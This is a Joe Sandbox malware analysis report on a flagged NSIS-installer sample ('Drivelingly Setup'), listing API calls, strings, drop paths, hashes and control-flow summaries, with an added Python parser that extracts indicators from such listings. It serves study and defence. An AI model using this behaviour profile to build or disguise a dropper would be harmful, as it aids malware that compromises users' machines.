                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057CA
                                                                        • OpenClipboard.USER32(00000000), ref: 004057DA
                                                                        • EmptyClipboard.USER32 ref: 004057E0
                                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 004057E9
                                                                        • GlobalLock.KERNEL32(00000000), ref: 004057F3
                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405807
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405820
                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 0040582B
                                                                        • CloseClipboard.USER32 ref: 00405831
                                                                        Strings
                                                                        • Drivelingly Setup: Installing, xrefs: 004057A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                        • String ID: Drivelingly Setup: Installing
                                                                        • API String ID: 4154960007-485533782
                                                                        • Opcode ID: 4a309e5079cdc708255a871e006116df9755c68536e1355fa5794f2576894f80
                                                                        • Instruction ID: 345e578925e8e8fc579d0e732d58a8f557a0115a7d420367cc7026d592e1690f
                                                                        • Opcode Fuzzy Hash: 4a309e5079cdc708255a871e006116df9755c68536e1355fa5794f2576894f80
                                                                        • Instruction Fuzzy Hash: D6A189B1900608BFDB11AF61DD89EAE7B79FB08354F40403AFA45B61A0CB758E51DF68
                                                                        Uniqueness
                                                                        • Uniqueness Score: -1.00%
                                                                        Control-flow Graph
                                                                        control_flow_graph 632 405a19-405a3f call 405cd7 635 405a41-405a53 DeleteFileA 632->635 636 405a58-405a5f 632->636 637 405be2-405be6 635->637 638 405a61-405a63 636->638 639 405a72-405a82 call 406257 636->639 640 405b90-405b95 638->640 641 405a69-405a6c 638->641 647 405a91-405a92 call 405c30 639->647 648 405a84-405a8f lstrcatA 639->648 640->637 643 405b97-405b9a 640->643 641->639 641->640 645 405ba4-405bac call 4065ce 643->645 646 405b9c-405ba2 643->646 645->637 655 405bae-405bc2 call 405be9 call 4059d1 645->655 646->637 650 405a97-405a9a 647->650 648->650 653 405aa5-405aab lstrcatA 650->653 654 405a9c-405aa3 650->654 656 405ab0-405ace lstrlenA FindFirstFileA 653->656 654->653 654->656 671 405bc4-405bc7 655->671 672 405bda-405bdd call 405378 655->672 657 405ad4-405aeb call 405c14 656->657 658 405b86-405b8a 656->658 665 405af6-405af9 657->665 666 405aed-405af1 657->666 658->640 662 405b8c 658->662 662->640 669 405afb-405b00 665->669 670 405b0c-405b1a call 406257 665->670 666->665 668 405af3 666->668 668->665 674 405b02-405b04 669->674 675 405b65-405b77 FindNextFileA 669->675 682 405b31-405b3c call 4059d1 670->682 683 405b1c-405b24 670->683 671->646 677 405bc9-405bd8 call 405378 call 406030 671->677 672->637 674->670 678 405b06-405b0a 674->678 675->657 680 405b7d-405b80 FindClose 675->680 677->637 678->670 678->675 680->658 691 405b5d-405b60 call 405378 682->691 692 405b3e-405b41 682->692 683->675 686 405b26-405b2f call 405a19 683->686 686->675 691->675 694 405b43-405b53 call 405378 call 406030 692->694 695 405b55-405b5b 692->695 694->675 695->675
                                                                        APIs
                                                                        • DeleteFileA.KERNELBASE(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"), ref: 00405A42
                                                                        • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"), ref: 00405A8A
                                                                        • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"), ref: 00405AAB
                                                                        • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"), ref: 00405AB1
                                                                        • FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"), ref: 00405AC2
                                                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6F
                                                                        • FindClose.KERNEL32(00000000), ref: 00405B80
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A26
                                                                        • \*.*, xrefs: 00405A84
                                                                        • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe", xrefs: 00405A22
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                        • API String ID: 2035342205-466807681
                                                                        • Opcode ID: 6279d5409f9ac8fecf523039a44e07b92db75dbea9c2d76fe17a079ddec69c30
                                                                        • Instruction ID: 3775624a82358ee84ae0e61ef35c65b769ecc780556a32b7edc65eda158531b4
                                                                        • Opcode Fuzzy Hash: 6279d5409f9ac8fecf523039a44e07b92db75dbea9c2d76fe17a079ddec69c30
                                                                        • Instruction Fuzzy Hash: D351BD30904A08AADB22AB618C89FAF7B78DF42714F24417BF441752D2D77C6982DE6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
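The API and Strings entries in these listings share one shape, `Api.MODULE(args), ref: address` and `value, xrefs: address`, and the arguments carry the indicators an analyst wants to pull out (the Temp directory, the Moviedom230\Grnnende drop path, the original sample path). The following is an added example and not part of the Joe Sandbox report: a small parser for that shape that splits arguments while keeping quoted paths whole, then collects file paths and per-API call sites. The five sample lines are copied from the listings on this page; no claim is made about Joe Sandbox's export format beyond what is visible here.

```python
import re
from typing import Dict, List, Optional

# Entry lines in the shape the "APIs" and "Strings" listings use. These five are
# copied from the listing on this page; in practice, feed the whole report text.
SAMPLE_LINES = [
    '• DeleteFileA.KERNELBASE(?,?,774D3410,C:\\Users\\user\\AppData\\Local\\Temp\\,'
    '"C:\\Users\\user\\Desktop\\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"), ref: 00405A42',
    '• FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6F',
    '• DestroyWindow.USER32 ref: 00403E75',
    '  • Part of subcall function 00406663: GetProcAddress.KERNEL32(00000000,?), ref: 00406690',
    '• C:\\Users\\user\\AppData\\Local\\Temp\\Moviedom230\\Grnnende, xrefs: 00402238',
]

# "<api>.<module>(<args>), ref: <address>"; the argument list and the
# "Part of subcall function" prefix are both optional.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# "<value>, xrefs: <address>" entries from the Strings lists.
STRING_RE = re.compile(r"^\s*•\s*(?P<value>.*?),\s*xrefs?:\s*(?P<xref>[0-9A-Fa-f]{8})\s*$")
# Windows paths, optionally wrapped in the double quotes the report prints.
PATH_RE = re.compile(r'^"?([A-Za-z]:\\[^"]*)"?$')


def split_args(raw: str) -> List[str]:
    """Split a comma-separated argument list while keeping quoted paths intact."""
    if not raw:
        return []
    out, cur, quoted = [], [], False
    for ch in raw:
        if ch == '"':
            quoted = not quoted
        elif ch == "," and not quoted:
            out.append("".join(cur))
            cur = []
            continue
        cur.append(ch)
    out.append("".join(cur))
    return out


def parse_line(line: str) -> Optional[Dict]:
    """Turn one listing line into a record, or None for headers and other text."""
    m = API_RE.match(line)
    if m:
        return {
            "kind": "api",
            "api": m["api"],
            "module": m["module"],
            "args": split_args(m["args"] or ""),
            "ref": m["ref"].upper(),
            "subcall": (m["subcall"] or "").upper() or None,
        }
    m = STRING_RE.match(line)
    if m:
        return {"kind": "string", "value": m["value"], "xref": m["xref"].upper()}
    return None


def parse_listing(lines) -> List[Dict]:
    return [rec for rec in (parse_line(l) for l in lines) if rec is not None]


def extract_paths(records: List[Dict]) -> List[str]:
    """Collect every file-system path that appears as an argument or a string."""
    paths = set()
    for rec in records:
        values = rec["args"] if rec["kind"] == "api" else [rec["value"]]
        for v in values:
            m = PATH_RE.match(v)
            if m:
                paths.add(m.group(1))
    return sorted(paths)


def call_sites(records: List[Dict]) -> Dict[str, List[str]]:
    """Map each API name to the code addresses it is called from (sorted, de-duplicated)."""
    sites: Dict[str, set] = {}
    for rec in records:
        if rec["kind"] == "api":
            sites.setdefault(rec["api"], set()).add(rec["ref"])
    return {api: sorted(refs) for api, refs in sorted(sites.items())}


if __name__ == "__main__":
    recs = parse_listing(SAMPLE_LINES)
    for p in extract_paths(recs):
        print("path:", p)
    for api, refs in call_sites(recs).items():
        print(f"{api:18s} <- {', '.join(refs)}")
```

Paths are matched only as whole arguments, so the `774D3410` and `?` placeholders never leak into the indicator list; the `Part of subcall function` prefix is kept as a separate field because those entries describe a callee, not the function whose record they appear in.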

                                                                        APIs
                                                                        • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F8
                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022AA
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende, xrefs: 00402238
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende
                                                                        • API String ID: 123533781-1242700388
                                                                        • Opcode ID: 1ce8e1dad735516c86711b48b508aba69c5835298ad9ca6a368bbeffde14f39b
                                                                        • Instruction ID: ec6a4b66970030f98d0c357d5daeebd90ed2a1685bb0ce4afdd26a2e8d50d7fb
                                                                        • Opcode Fuzzy Hash: 1ce8e1dad735516c86711b48b508aba69c5835298ad9ca6a368bbeffde14f39b
                                                                        • Instruction Fuzzy Hash: 68511675A00208BFDF10DFE4C988A9D7BB6AF48314F2045AAF505EB2D1DA799981CB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindFirstFileA.KERNELBASE(774D3410,0042C0E0,0042BC98,00405D1A,0042BC98,0042BC98,00000000,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,774D3410,C:\Users\user\AppData\Local\Temp\), ref: 004065D9
                                                                        • FindClose.KERNEL32(00000000), ref: 004065E5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID:
                                                                        • API String ID: 2295610775-0
                                                                        • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                        • Instruction ID: 8216c8ff522cab9e5c4fbd2006c0822adf2a7579a10bfa080a6703c422ecd414
                                                                        • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                        • Instruction Fuzzy Hash: 66D01231504520EBC7515B78BD0CC4B7A589F053313218A36F466F22E4CB34CC22A6DC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        Control-flow graph (edge list of the original page's graph figure): function 00403DDA, basic blocks 403DDA-4042AA; API calls SetWindowPos, ShowWindow, GetWindowLongA, DestroyWindow, SetWindowLongA, GetDlgItem, SendMessageA, IsWindowEnabled, SetClassLongA, KiUserCallbackDispatcher, EnableWindow, GetSystemMenu, EnableMenuItem, lstrlenA, SetWindowTextA, EndDialog, CreateDialogParamA, GetWindowRect, ScreenToClient; calls to subroutines 4042D4, 40140B, 404320, 401389, 40433B, 4062EA, 4042F6, 4042AD, 404309, 403DBB, 406257.
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E16
                                                                        • ShowWindow.USER32(?), ref: 00403E36
                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00403E48
                                                                        • ShowWindow.USER32(?,00000004), ref: 00403E61
                                                                        • DestroyWindow.USER32 ref: 00403E75
                                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403E8E
                                                                        • GetDlgItem.USER32(?,?), ref: 00403EAD
                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403EC1
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403EC8
                                                                        • GetDlgItem.USER32(?,00000001), ref: 00403F73
                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403F7D
                                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403F97
                                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403FE8
                                                                        • GetDlgItem.USER32(?,00000003), ref: 0040408E
                                                                        • ShowWindow.USER32(00000000,?), ref: 004040AF
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040C1
                                                                        • EnableWindow.USER32(?,?), ref: 004040DC
                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040F2
                                                                        • EnableMenuItem.USER32(00000000), ref: 004040F9
                                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00404111
                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00404124
                                                                        • lstrlenA.KERNEL32(Drivelingly Setup: Installing,?,Drivelingly Setup: Installing,00000000), ref: 0040414E
                                                                        • SetWindowTextA.USER32(?,Drivelingly Setup: Installing), ref: 0040415D
                                                                        • ShowWindow.USER32(?,0000000A), ref: 00404291
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                        • String ID: Click Next to continue.$Drivelingly Setup: Installing
                                                                        • API String ID: 121052019-1179622201
                                                                        • Opcode ID: aac620bc095f4252ac758a5593f12f54aac5fa40f8eaddec9af95cb9fb46cec6
                                                                        • Instruction ID: f21371ea752dfce5ee3d4a80c6152a791402a2454a60405a922b397e1036299a
                                                                        • Opcode Fuzzy Hash: aac620bc095f4252ac758a5593f12f54aac5fa40f8eaddec9af95cb9fb46cec6
                                                                        • Instruction Fuzzy Hash: C1C1E5B1A00205AFDB207F62ED45E2B3A78EB85745F41053EF641B51F0CB799852DB2D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        Control-flow graph (edge list of the original page's graph figure): function 00403A3D, basic blocks 403A3D-403D01; API calls lstrcatA, lstrlenA, lstrcmpiA, GetFileAttributesA, LoadImageA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, ShowWindow, GetClassInfoA, DialogBoxParamA; calls to subroutines 406663, 4061B5, 40613E, 403D02, 405CD7, 4062EA, 40140B, 405C14, 405BE9, 406257, 405C30, 4065F5, 40544A, 40398D.
                                                                        APIs
                                                                          • Part of subcall function 00406663: GetModuleHandleA.KERNEL32(?,00000000,?,004034F5,0000000B), ref: 00406675
                                                                          • Part of subcall function 00406663: GetProcAddress.KERNEL32(00000000,?), ref: 00406690
                                                                        • lstrcatA.KERNEL32(1033,Drivelingly Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Drivelingly Setup: Installing,00000000,00000002,774D3410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",00000009,0000000B), ref: 00403AB8
                                                                        • lstrlenA.KERNEL32(ExecToStack,?,?,?,ExecToStack,00000000,C:\Users\user\AppData\Local\Temp\Moviedom230,1033,Drivelingly Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Drivelingly Setup: Installing,00000000,00000002,774D3410), ref: 00403B2D
                                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B40
                                                                        • GetFileAttributesA.KERNEL32(ExecToStack,?,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",00000009,0000000B), ref: 00403B4B
                                                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Moviedom230), ref: 00403B94
                                                                          • Part of subcall function 004061B5: wsprintfA.USER32 ref: 004061C2
                                                                        • RegisterClassA.USER32(0042EBC0), ref: 00403BD1
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BE9
                                                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C1E
                                                                        • ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",00000009,0000000B), ref: 00403C54
                                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403C80
                                                                        • GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403C8D
                                                                        • RegisterClassA.USER32(0042EBC0), ref: 00403C96
                                                                        • DialogBoxParamA.USER32(?,00000000,00403DDA,00000000), ref: 00403CB5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Moviedom230$Control Panel\Desktop\ResourceLocale$Drivelingly Setup: Installing$ExecToStack$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                        • API String ID: 1975747703-1082578815
                                                                        • Opcode ID: 7bc32a605757a0a9e48070d62dcab25d393d6e445afaf259b4bfaf426d6d40e1
                                                                        • Instruction ID: 6db815c1d0a977664f3d39510f8e98c50f9dfcfb4850e4c10674fdff383f0bc2
                                                                        • Opcode Fuzzy Hash: 7bc32a605757a0a9e48070d62dcab25d393d6e445afaf259b4bfaf426d6d40e1
                                                                        • Instruction Fuzzy Hash: C061B9716442046EE620BF669D46F373A7CEB54709F40443FF941B62D3CB7CA9069A2D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        Control-flow graph (edge list of the original page's graph figure): function 00402F0C, basic blocks 402F0C-403140; API calls GetTickCount, GetModuleFileNameA, GetFileSize, GlobalAlloc, SetFilePointer; calls to subroutines 405DEA, 406257, 405C30, 402EA8, 403355, 40336B, 403143, 405DA5, 40671A.
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00402F1D
                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,00000400,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402F39
                                                                          • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F4C,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                                          • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405E10
                                                                        • GetFileSize.KERNEL32(00000000,00000000,SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,80000000,00000003,?,?,004036FD,?,?,00000007), ref: 00402F85
                                                                        • GlobalAlloc.KERNEL32(00000040,00000007,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 004030BB
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402F13
                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 004030E2
                                                                        • Error launching installer, xrefs: 00402F5C
                                                                        • Null, xrefs: 00403003
                                                                        • C:\Users\user\Desktop, xrefs: 00402F67, 00402F6C, 00402F72
                                                                        • C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, xrefs: 00402F23, 00402F32, 00402F46, 00402F66
                                                                        • Inst, xrefs: 00402FF1
                                                                        • @TA, xrefs: 00402F9A
                                                                        • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe", xrefs: 00402F12
                                                                        • soft, xrefs: 00402FFA
                                                                        • SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, xrefs: 00402F79
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
